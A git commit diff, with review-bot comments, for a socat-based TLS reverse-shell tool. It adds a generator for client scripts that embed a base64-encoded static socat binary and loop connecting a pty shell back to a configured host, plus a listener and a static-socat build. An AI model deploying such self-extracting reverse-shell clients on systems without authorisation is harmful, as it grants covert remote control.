| author | Mitchell Riedstra <mitch@riedstra.dev> | 2022-12-26 13:06:48 -0500 |
|---|---|---|
| committer | Mitchell Riedstra <mitch@riedstra.dev> | 2022-12-26 13:06:48 -0500 |
| commit | 639e50050702d094a9464cf263995f7f19079eaf (patch) | |
| tree | cd6502f6d5af67e5a887474ed3225af37a20cd02 | |
| parent | 9bd432b5de3592f89d885deaff953418822acaa9 (diff) | |
| download | rshsh-639e50050702d094a9464cf263995f7f19079eaf.tar.gz rshsh-639e50050702d094a9464cf263995f7f19079eaf.tar.xz | |
| -rw-r--r-- | .gitignore | 5 | ||||
| -rwxr-xr-x | genclient-embed.sh | 48 | ||||
| -rwxr-xr-x | genclient.sh | 7 | ||||
| -rwxr-xr-x | lib/spawn | 13 | ||||
| -rw-r--r-- | readme.md | 7 | ||||
| -rwxr-xr-x | server.sh | 4 | ||||
| -rw-r--r-- | socat/Dockerfile | 13 | ||||
| -rwxr-xr-x | socat/build.sh | 5 | ||||
| -rw-r--r-- | vars | 4 |
9 files changed, 93 insertions, 13 deletions
@@ -1,3 +1,2 @@
-*.crt
-*.key
-*.pem
+/keys/*
+/socat/socat
diff --git a/genclient-embed.sh b/genclient-embed.sh
new file mode 100755
index 0000000..8c4c144
--- /dev/null
+++ b/genclient-embed.sh
@@ -0,0 +1,48 @@
+#!/bin/sh
+
+. ./vars
+
+help() {
+cat <<EOF
+Usage: $0
+
+ Generates a client shell script based on the variables set in 'vars'
+ and prints to stdout
+
+EOF
+exit 1;
+}
+
+while [ $# -gt 0 ] ; do case $1 in
+ *) help ;;
+esac; done
+
+cat <<EOF
+#!/bin/sh
+socat="\$(mktemp)"
+
+sed -ne'/^__BEGIN'_'SOCAT__/,\$p' "\$0" | sed 1d | base64 -d \\
+ | gzip -dc > "\$socat"
+
+chmod +x "\$socat"
+
+_shell="\$(which zsh mksh bash ksh zsh ash sh 2>/dev/null | sed 1q)"
+certificate='$(cat ${basename}.crt)'
+crt_tmp="\$(mktemp)"
+trap 'rm -f \$crt_tmp \$socat; exit 0' EXIT INT
+echo "\$certificate" > "\$crt_tmp"
+while [ $loop -ne 0 ] ; do
+"\$socat" exec:"\$_shell",pty,stderr,setsid,sigint,sane \\
+ "OPENSSL:$hostname:$port,verify=$verify,cafile=\$crt_tmp"
+sleep $timeout
+done
+
+exit 0
+
+__BEGIN_SOCAT__
+EOF
+
+if [ -e socat/socat ] ; then
+ gzip -9c < socat/socat | base64
+fi
+
diff --git a/genclient.sh b/genclient.sh
index 9984a8b..6e2cda2 100755
--- a/genclient.sh
+++ b/genclient.sh
@@ -23,10 +23,13 @@ cat <<EOF
 _shell="\$(which zsh mksh bash ksh zsh ash sh 2>/dev/null | sed 1q)"
 certificate='$(cat ${basename}.crt)'
 crt_tmp="\$(mktemp)"
+trap 'rm -f \$crt_tmp; exit 0' EXIT INT
 echo "\$certificate" > "\$crt_tmp"
 while [ $loop -ne 0 ] ; do
-socat exec:"\$_shell",pty,stderr,setsid,sigint,sane OPENSSL:$hostname:$port,verify=$verify,cafile=\$crt_tmp
+socat exec:"\$_shell",pty,stderr,setsid,sigint,sane \\
+ "OPENSSL:$hostname:$port,verify=$verify,cafile=\$crt_tmp"
 sleep $timeout
 done
-rm "\$crt_tmp"
+
+exit 0
 EOF
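Review bot: When `socat/socat` is missing, the trailing `if [ -e socat/socat ]` in genclient-embed.sh only omits the payload while the rest of the client, including the `__BEGIN_SOCAT__` marker, is still emitted, so the generator exits 0 and hands out a client that decodes an empty blob, makes an empty temp file executable and fails at run time. Check up front instead, right after `. ./vars`: `[ -e socat/socat ] || { echo "socat/socat not found; run socat/build.sh first" >&2; exit 1; }`. The generated `trap 'rm -f \$crt_tmp \$socat; exit 0' EXIT INT` also forces exit status 0 from the EXIT trap, hiding failures of the extraction pipeline or of socat itself; the same pattern is introduced in the genclient.sh hunk below, and splitting it into `trap 'rm -f "\$crt_tmp" "\$socat"' EXIT` plus `trap 'exit 130' INT` keeps the real status and quotes the paths, which matters when `mktemp` honours a `TMPDIR` containing spaces. Minor: the `which zsh mksh bash ksh zsh ash sh` fallback list names `zsh` twice.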
@@ -4,16 +4,19 @@ SOCKDIR=$(mktemp -d) SOCKF=${SOCKDIR}/usock +trap 'rm -rf $SOCKDIR' EXIT INT + # Start tmux, if needed -if ! tmux ls | grep -q rshsh; then - tmux new -s rshsh -d +if ! tmux ls | grep -q "$tmux_session"; then + tmux new -s "$tmux_session" -d fi # Create window -tmux new-window -t rshsh "socat UNIX-LISTEN:${SOCKF},umask=0077 file:\$(tty),raw,echo=0" +tmux new-window -t "$tmux_session" \ + "stty raw -echo ; socat file:\$(tty),raw,echo=0 UNIX-LISTEN:${SOCKF},umask=0077" # Wait for socket -while test ! -e ${SOCKF} ; do sleep 1 ; done +while test ! -e "${SOCKF}" ; do sleep 1 ; done # Use socat to ship data between the unix socket and STDIO. -exec socat STDIO UNIX-CONNECT:${SOCKF} +exec socat STDIO "UNIX-CONNECT:${SOCKF}" @@ -31,6 +31,13 @@ $ ./genclient.sh > /tmp/client.sh And you can `scp` it off to your other boxes or whatever. Even copy and paste works. +## Building static socat + +In the `socat` directory there's a `build.sh` that can be used to build +a statically linked socat binary. + +There's a script `genclient-embed.sh` which can then be used to generate a +client script that has socat embedded. ## Attaching to a connected reverse shell @@ -12,7 +12,7 @@ EOF while [ $# -gt 0 ] ; do case $1 in -p) port="$2"; shift ; shift ;; -k) key="$2"; shift ; shift ;; - *) help ;; + *) help ; exit 1;; esac ; done if ! [ -e "$key" ] ; then @@ -20,4 +20,4 @@ if ! [ -e "$key" ] ; then cat "${basename}.key" "${basename}.crt" > "${basename}.pem" fi -socat OPENSSL-LISTEN:${port},cert=${key},reuseaddr,verify=0,fork EXEC:lib/spawn +socat "OPENSSL-LISTEN:${port},cert=${key},reuseaddr,verify=0,fork" "EXEC:lib/spawn" diff --git a/socat/Dockerfile b/socat/Dockerfile new file mode 100644 index 0000000..1cfd72a --- /dev/null +++ b/socat/Dockerfile 
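Review bot: The new `trap 'rm -rf $SOCKDIR' EXIT INT` in lib/spawn does not fire on the normal path, because the script ends in `exec socat STDIO "UNIX-CONNECT:${SOCKF}"` and `exec` replaces the shell before any EXIT trap can run, so every session leaves its mktemp directory and socket behind. Dropping the `exec` (`socat STDIO "UNIX-CONNECT:${SOCKF}"`) lets the shell outlive socat and run the cleanup; quoting `"$SOCKDIR"` inside the trap string is cheap while you are there. The session check `tmux ls | grep -q "$tmux_session"` is an unanchored regex substring match, so any session whose name merely contains the value also satisfies it and no session gets created; `tmux has-session -t "=$tmux_session" 2>/dev/null` tests for exactly that session. Where `tmux_session` is defined is outside the hunk (presumably `vars` sourced above line 4).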
@@ -0,0 +1,13 @@ +FROM docker.io/alpine:latest +ARG SOCAT_VERSION + +RUN apk add gcc make alpine-sdk openssl-dev openssl-libs-static + +RUN wget http://www.dest-unreach.org/socat/download/socat-$SOCAT_VERSION.tar.gz + +RUN tar xfzv socat-$SOCAT_VERSION.tar.gz + +WORKDIR /socat-$SOCAT_VERSION + +RUN env LDFLAGS=-static ./configure --enable-openssl && make -j$(nproc) + diff --git a/socat/build.sh b/socat/build.sh new file mode 100755 index 0000000..e50e5bf --- /dev/null +++ b/socat/build.sh @@ -0,0 +1,5 @@ +#!/bin/sh +SOCAT_VERSION=1.7.3.4 +image=socat-builder:latest +buildah build --build-arg SOCAT_VERSION=$SOCAT_VERSION -t $image . +podman run --rm -v "$(pwd)":/out/ $image cp -v /socat-$SOCAT_VERSION/socat /out/ @@ -1,7 +1,9 @@ #!/bin/sh +# What tmux session are we going to use for this? +tmux_session="rshsh" # Server's hostname -hostname="do.rygel.us" +hostname="changeme.example.com" # Do we verify the server certificate? verify=1 # This is used to tell the client script whether it should loop in infinity |
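Review bot: The socat tarball in socat/Dockerfile is fetched over plain `http://` and nothing checks what came back, so the build trusts whatever the network returns, and that binary is what genclient-embed.sh then embeds into every generated client; build.sh pins `SOCAT_VERSION=1.7.3.4` but pins no content. Add an `ARG SOCAT_SHA256` and verify before `tar`: `RUN wget https://www.dest-unreach.org/socat/download/socat-$SOCAT_VERSION.tar.gz && echo "$SOCAT_SHA256  socat-$SOCAT_VERSION.tar.gz" | sha256sum -c -`, with the digest passed from build.sh via `--build-arg SOCAT_SHA256=<sha256 of the upstream release tarball>` (the value is not on this page and must be taken from the upstream release). `FROM docker.io/alpine:latest` is likewise unpinned, so the toolchain producing the static binary drifts between builds; a tagged Alpine release, or an image digest, keeps the artifact reproducible.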
